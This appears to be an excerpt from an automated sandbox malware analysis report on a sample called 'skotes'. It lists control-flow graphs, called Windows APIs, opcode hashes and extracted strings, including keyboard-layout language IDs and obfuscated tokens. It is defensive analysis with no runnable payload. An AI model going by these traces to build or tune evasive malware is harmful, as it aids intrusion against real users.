                                        control_flow_graph 922 f65ee0-f65fde 928 f65fe0-f65fec 922->928 929 f66008-f66015 call f7cff1 922->929 930 f65ffe-f66005 call f7d663 928->930 931 f65fee-f65ffc 928->931 930->929 931->930 934 f66016-f6619d call f96c6a call f7e150 call f780c0 * 5 RegOpenKeyExA 931->934 951 f661a3-f66233 call f940f0 934->951 952 f664b1-f664ba 934->952 978 f6649f-f664ab 951->978 979 f66239-f6623d 951->979 954 f664e7-f664f0 952->954 955 f664bc-f664c7 952->955 959 f664f2-f664fd 954->959 960 f6651d-f66526 954->960 957 f664dd-f664e4 call f7d663 955->957 958 f664c9-f664d7 955->958 957->954 958->957 963 f665d7-f665df call f96c6a 958->963 965 f66513-f6651a call f7d663 959->965 966 f664ff-f6650d 959->966 961 f66553-f6655c 960->961 962 f66528-f66533 960->962 972 f66585-f6658e 961->972 973 f6655e-f66569 961->973 969 f66535-f66543 962->969 970 f66549-f66550 call f7d663 962->970 965->960 966->963 966->965 969->963 969->970 970->961 975 f66590-f6659f 972->975 976 f665bb-f665d6 call f7cff1 972->976 982 f6657b-f66582 call f7d663 973->982 983 f6656b-f66579 973->983 984 f665b1-f665b8 call f7d663 975->984 985 f665a1-f665af 975->985 978->952 987 f66243-f66279 RegEnumValueA 979->987 988 f66499 979->988 982->972 983->963 983->982 984->976 985->963 985->984 994 f66486-f6648d 987->994 995 f6627f-f6629e 987->995 988->978 994->987 997 f66493 994->997 999 f662a0-f662a5 995->999 997->988 999->999 1000 f662a7-f662fb call f780c0 call f77a00 * 2 call f65d50 999->1000 1000->994
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true
                                        • Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_f60000_skotes.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 00000419$00000422$00000423$0000043f$Keyboard Layout\Preload
                                        • API String ID: 0-3963862150
                                        • Opcode ID: 9d24ef05906e8520c5bc73d392f77f0765dae3ffcf754c7e164f3d7e67cba21e
                                        • Instruction ID: ec0389c7e7a9b69cb644b6daa26fa24370daab7e7b9e6d68aed444ce3d9076b2
                                        • Opcode Fuzzy Hash: 9d24ef05906e8520c5bc73d392f77f0765dae3ffcf754c7e164f3d7e67cba21e
                                        • Instruction Fuzzy Hash: AAD1CD71900218ABEB24DF24CC89BDEB7B9AF04340F5442D9E409E7291DB74AEA49F95

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1008 f67d30-f67db2 call f940f0 1012 f68356-f68373 call f7cff1 1008->1012 1013 f67db8-f67de0 call f77a00 call f65c10 1008->1013 1020 f67de4-f67e06 call f77a00 call f65c10 1013->1020 1021 f67de2 1013->1021 1026 f67e0a-f67e23 1020->1026 1027 f67e08 1020->1027 1021->1020 1030 f67e54-f67e7f 1026->1030 1031 f67e25-f67e34 1026->1031 1027->1026 1032 f67eb0-f67ed1 1030->1032 1033 f67e81-f67e90 1030->1033 1034 f67e36-f67e44 1031->1034 1035 f67e4a-f67e51 call f7d663 1031->1035 1038 f67ed7-f67edc 1032->1038 1039 f67ed3-f67ed5 GetNativeSystemInfo 1032->1039 1036 f67ea6-f67ead call f7d663 1033->1036 1037 f67e92-f67ea0 1033->1037 1034->1035 1040 f68374 call f96c6a 1034->1040 1035->1030 1036->1032 1037->1036 1037->1040 1045 f67edd-f67ee6 1038->1045 1039->1045 1046 f68379-f6837f call f96c6a 1040->1046 1049 f67f04-f67f07 1045->1049 1050 f67ee8-f67eef 1045->1050 1051 f682f7-f682fa 1049->1051 1052 f67f0d-f67f16 1049->1052 1054 f67ef5-f67eff 1050->1054 1055 f68351 1050->1055 1051->1055 1058 f682fc-f68305 1051->1058 1056 f67f18-f67f24 1052->1056 1057 f67f29-f67f2c 1052->1057 1060 f6834c 1054->1060 1055->1012 1056->1060 1061 f682d4-f682d6 1057->1061 1062 f67f32-f67f39 1057->1062 1063 f68307-f6830b 1058->1063 1064 f6832c-f6832f 1058->1064 1060->1055 1071 f682e4-f682e7 1061->1071 1072 f682d8-f682e2 1061->1072 1065 f67f3f-f67f9b call f77a00 call f65c10 call f77a00 call f65c10 call f65d50 1062->1065 1066 f68019-f682bd call f77a00 call f65c10 call f77a00 call f65c10 call f65d50 call f77a00 call f65c10 call f65730 call f77a00 call f65c10 call f77a00 call f65c10 call f65d50 call f77a00 call f65c10 call f65730 call f77a00 call f65c10 call f77a00 call f65c10 call f65d50 call f77a00 call f65c10 call f65730 call f77a00 call f65c10 call f77a00 call f65c10 call f65d50 call f77a00 call f65c10 call f65730 1062->1066 1067 f68320-f6832a 1063->1067 1068 f6830d-f68312 1063->1068 1069 f68331-f6833b 1064->1069 1070 f6833d-f68349 1064->1070 1094 f67fa0-f67fa7 1065->1094 1107 f682c3-f682cc 1066->1107 1067->1055 1068->1067 1075 f68314-f6831e 1068->1075 1069->1055 1070->1060 1071->1055 1073 f682e9-f682f5 1071->1073 1072->1060 1073->1060 1075->1055 1096 f67fab-f67fcb call f98bbe 1094->1096 1097 f67fa9 1094->1097 1102 f68002-f68004 1096->1102 1103 f67fcd-f67fdc 1096->1103 1097->1096 1102->1107 1108 f6800a-f68014 1102->1108 1105 f67ff2-f67fff call f7d663 1103->1105 1106 f67fde-f67fec 1103->1106 1105->1102 1106->1046 1106->1105 1107->1051 1112 f682ce 1107->1112 1108->1107 1112->1061
                                        APIs
                                        • GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00F67ED3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true
                                        • Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_f60000_skotes.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InfoNativeSystem
                                        • String ID: JjsrPl==$JjsrQV==$JjssOl==$JjssPV==
                                        • API String ID: 1721193555-3123340372
                                        • Opcode ID: 4b1229c8dfdac89c3e8a14ee481c83371a2f3f1bcbb2f2d50d4b2dc46d649f8c
                                        • Instruction ID: a7a77757425d466ef55aad9d6fe79689ee2bafe7d3c5f4c76418020b37802c01
                                        • Opcode Fuzzy Hash: 4b1229c8dfdac89c3e8a14ee481c83371a2f3f1bcbb2f2d50d4b2dc46d649f8c
                                        • Instruction Fuzzy Hash: 64E10471E002449BDF24BB28CD1B79D7B71AB41724F94429CE4196B3C2DB398E95ABC3

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1274 f9d634-f9d655 call f7df80 1277 f9d66f-f9d672 1274->1277 1278 f9d657 1274->1278 1280 f9d68e-f9d69a call f9a7c8 1277->1280 1281 f9d674-f9d677 1277->1281 1279 f9d659-f9d65f 1278->1279 1278->1280 1283 f9d661-f9d665 1279->1283 1284 f9d683-f9d68c call f9d57c 1279->1284 1291 f9d69c-f9d69f 1280->1291 1292 f9d6a4-f9d6b0 call f9d5be 1280->1292 1281->1284 1285 f9d679-f9d67c 1281->1285 1283->1280 1287 f9d667-f9d66b 1283->1287 1299 f9d6cc-f9d6d5 1284->1299 1288 f9d67e-f9d681 1285->1288 1289 f9d6b2-f9d6c2 call f975f6 call f96c5a 1285->1289 1287->1289 1293 f9d66d 1287->1293 1288->1284 1288->1289 1289->1291 1296 f9d80b-f9d81a 1291->1296 1292->1289 1306 f9d6c4-f9d6c9 1292->1306 1293->1284 1302 f9d6e2-f9d6f3 1299->1302 1303 f9d6d7-f9d6df call f98dc8 1299->1303 1304 f9d709 1302->1304 1305 f9d6f5-f9d707 1302->1305 1303->1302 1309 f9d70b-f9d71c 1304->1309 1305->1309 1306->1299 1311 f9d78a-f9d79a call f9d7c7 1309->1311 1312 f9d71e-f9d720 1309->1312 1322 f9d809 1311->1322 1323 f9d79c-f9d79e 1311->1323 1314 f9d81b-f9d81d 1312->1314 1315 f9d726-f9d728 1312->1315 1319 f9d81f-f9d826 call f98e10 1314->1319 1320 f9d827-f9d83a call f965ed 1314->1320 1317 f9d72a-f9d72d 1315->1317 1318 f9d734-f9d740 1315->1318 1317->1318 1324 f9d72f-f9d732 1317->1324 1325 f9d780-f9d788 1318->1325 1326 f9d742-f9d757 call f9d62b * 2 1318->1326 1319->1320 1340 f9d848-f9d84e 1320->1340 1341 f9d83c-f9d846 1320->1341 1322->1296 1329 f9d7d9-f9d7e2 1323->1329 1330 f9d7a0-f9d7b6 call f9a671 1323->1330 1324->1318 1331 f9d75a-f9d75c 1324->1331 1325->1311 1326->1331 1350 f9d7e5-f9d7e8 1329->1350 1330->1350 1331->1325 1337 f9d75e-f9d76e 1331->1337 1339 f9d770-f9d775 1337->1339 1339->1311 1344 f9d777-f9d77e 1339->1344 1346 f9d850-f9d851 1340->1346 1347 f9d867-f9d878 RtlAllocateHeap 1340->1347 1341->1340 1345 f9d87c-f9d887 call f975f6 1341->1345 1344->1339 1358 f9d889-f9d88b 1345->1358 1346->1347 1352 f9d87a 1347->1352 1353 f9d853-f9d85a call f99dc0 1347->1353 1355 f9d7ea-f9d7ed 1350->1355 1356 f9d7f4-f9d7fc 1350->1356 1352->1358 1353->1345 1364 f9d85c-f9d865 call f98e36 1353->1364 1355->1356 1359 f9d7ef-f9d7f2 1355->1359 1356->1322 1360 f9d7fe-f9d806 call f9a671 1356->1360 1359->1322 1359->1356 1360->1322 1364->1345 1364->1347
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true
                                        • Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_f60000_skotes.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8d8d2815bc2b38d7ee7be00df7534119ed9b86ef9d95154147aa6b29af1b4546
                                        • Instruction ID: 1ad8ab873c67edca9e6f2fab82de2d840feb913a025f55081c6df3a3425d5bc5
                                        • Opcode Fuzzy Hash: 8d8d2815bc2b38d7ee7be00df7534119ed9b86ef9d95154147aa6b29af1b4546
                                        • Instruction Fuzzy Hash: ED61F532D002148FFF25EFA8D8957EDB7B0EB55320F38411AE859A7291D6359C00AB62

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1368 f68380-f68401 call f940f0 1372 f68403-f68408 1368->1372 1373 f6840d-f68435 call f77a00 call f65c10 1368->1373 1374 f6854f-f6856b call f7cff1 1372->1374 1381 f68437 1373->1381 1382 f68439-f6845b call f77a00 call f65c10 1373->1382 1381->1382 1387 f6845f-f68478 1382->1387 1388 f6845d 1382->1388 1391 f6847a-f68489 1387->1391 1392 f684a9-f684d4 1387->1392 1388->1387 1393 f6849f-f684a6 call f7d663 1391->1393 1394 f6848b-f68499 1391->1394 1395 f684d6-f684e5 1392->1395 1396 f68501-f68522 1392->1396 1393->1392 1394->1393 1399 f6856c-f68571 call f96c6a 1394->1399 1401 f684f7-f684fe call f7d663 1395->1401 1402 f684e7-f684f5 1395->1402 1397 f68524-f68526 GetNativeSystemInfo 1396->1397 1398 f68528-f6852d 1396->1398 1405 f6852e-f68535 1397->1405 1398->1405 1401->1396 1402->1399 1402->1401 1405->1374 1410 f68537-f6853f 1405->1410 1411 f68541-f68546 1410->1411 1412 f68548-f6854b 1410->1412 1411->1374 1412->1374 1413 f6854d 1412->1413 1413->1374
                                        APIs
                                        • GetNativeSystemInfo.KERNELBASE(?), ref: 00F68524
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true
                                        • Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_f60000_skotes.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: InfoNativeSystem
                                        • String ID:
                                        • API String ID: 1721193555-0
                                        • Opcode ID: 561e37248fbe149d9b83b84415af2550974d6c15f9f32026aed97d0277eebe9e
                                        • Instruction ID: 04817d0ac6241585bbb353ea6ce7a20e83d4a2e25ccc7121f22a244ac54e1a17
                                        • Opcode Fuzzy Hash: 561e37248fbe149d9b83b84415af2550974d6c15f9f32026aed97d0277eebe9e
                                        • Instruction Fuzzy Hash: F7512371D102089BEB24EB28CD49BDDB775EB45320F5043ADE809A7281EF359EC19B92

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1414 f9d82f-f9d83a 1415 f9d848-f9d84e 1414->1415 1416 f9d83c-f9d846 1414->1416 1418 f9d850-f9d851 1415->1418 1419 f9d867-f9d878 RtlAllocateHeap 1415->1419 1416->1415 1417 f9d87c-f9d887 call f975f6 1416->1417 1425 f9d889-f9d88b 1417->1425 1418->1419 1421 f9d87a 1419->1421 1422 f9d853-f9d85a call f99dc0 1419->1422 1421->1425 1422->1417 1427 f9d85c-f9d865 call f98e36 1422->1427 1427->1417 1427->1419
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00000003,00F9A72D,?,?,?,00F9666A,?,00F66F28,00000000,00000000,88B68CA5), ref: 00F9D871
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true
                                        • Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_f60000_skotes.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: 1ce3491054e4c15254d3ef10b772642b48a6e39abb7d39298c51b5c47098e8d4
                                        • Instruction ID: e661308ea8e952be40fda792d12308dbb3632bad9a88df01814454e0e8396c16
                                        • Opcode Fuzzy Hash: 1ce3491054e4c15254d3ef10b772642b48a6e39abb7d39298c51b5c47098e8d4
                                        • Instruction Fuzzy Hash: 16F0E232E4522466FF213A769C05B9B3759DF853B0B398022ED08A7183DA20EC01B2E0

                                        Control-flow Graph

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true
                                        • Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_f60000_skotes.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Sleep
                                        • String ID:
                                        • API String ID: 3472027048-0
                                        • Opcode ID: 7f742f939edf490a00bca573ead1b3c1a63f359ac90a6d46ee86715bc3685c4c
                                        • Instruction ID: 482fcae062a350baa1497f639f7c5096fb55a459c6983f9662d3a415d90a72dc
                                        • Opcode Fuzzy Hash: 7f742f939edf490a00bca573ead1b3c1a63f359ac90a6d46ee86715bc3685c4c
                                        • Instruction Fuzzy Hash: 32F0F971A00604A7CB117B789D03F1E7B74EB06B60F804359E415772D1EB786A04A7D3

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1534 52d01c4-52d026a
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3483903750.00000000052D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 052D0000, based on PE: false
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_52d0000_skotes.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 3cc422e43e92e91d030b2f24514a1641a1ba30ebec6037cff33782d80288b8e6
                                        • Instruction ID: ccf593c5ef320b3f47aa491e9e4988817fd52cb7273e39280750cc267b161e29
                                        • Opcode Fuzzy Hash: 3cc422e43e92e91d030b2f24514a1641a1ba30ebec6037cff33782d80288b8e6
                                        • Instruction Fuzzy Hash: B7F0277347F1229E9310D161156C5BFE25BADE5310F71842FF042C3425F389D6469132
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true
                                        • Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_f60000_skotes.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: #$111$246122658369$9c9aa5$GnNoc2Hc$MGE+$MQ==$UA==$WDw=$WTs=$WTw=
                                        • API String ID: 0-2571795437
                                        • Opcode ID: d790bcffd7cccc5a2a17bc002417a9c05b71b6770230d4b319241e4371f23b47
                                        • Instruction ID: 4a703d6ec62ea75e1360a8bff8ebe084c91ecf0d5d1405f3e551887c5fef6552
                                        • Opcode Fuzzy Hash: d790bcffd7cccc5a2a17bc002417a9c05b71b6770230d4b319241e4371f23b47
                                        • Instruction Fuzzy Hash: BF82E2709142889BEF14EF68CD497CE7FB6AF41304F508199E809673C2D7799A88DBD2
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true
                                        • Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_f60000_skotes.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __floor_pentium4
                                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                        • API String ID: 4168288129-2761157908
                                        • Opcode ID: 179f43bf7dc488b8c6fb2afc698fee60af60cbee9e70b22bbf2e69ab58504981
                                        • Instruction ID: c1bdacded43f6e2cb7d0a82364a389afade6f7f5618c5013b1552ca27411c59d
                                        • Opcode Fuzzy Hash: 179f43bf7dc488b8c6fb2afc698fee60af60cbee9e70b22bbf2e69ab58504981
                                        • Instruction Fuzzy Hash: 12C25FB1E046288FDF25CE28DD407E9B3B5EB89315F1441EAE84DE7240E779AE819F40
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3471949438.0000000000F61000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F60000, based on PE: true
                                        • Associated: 00000007.00000002.3471916677.0000000000F60000.00000004.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3471949438.0000000000FC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472430333.0000000000FC9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000000FCB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001167000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001282000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.000000000128A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3472466418.0000000001298000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475071025.0000000001299000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3475508599.000000000144D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                        • Associated: 00000007.00000002.3477381734.000000000144F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_f60000_skotes.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
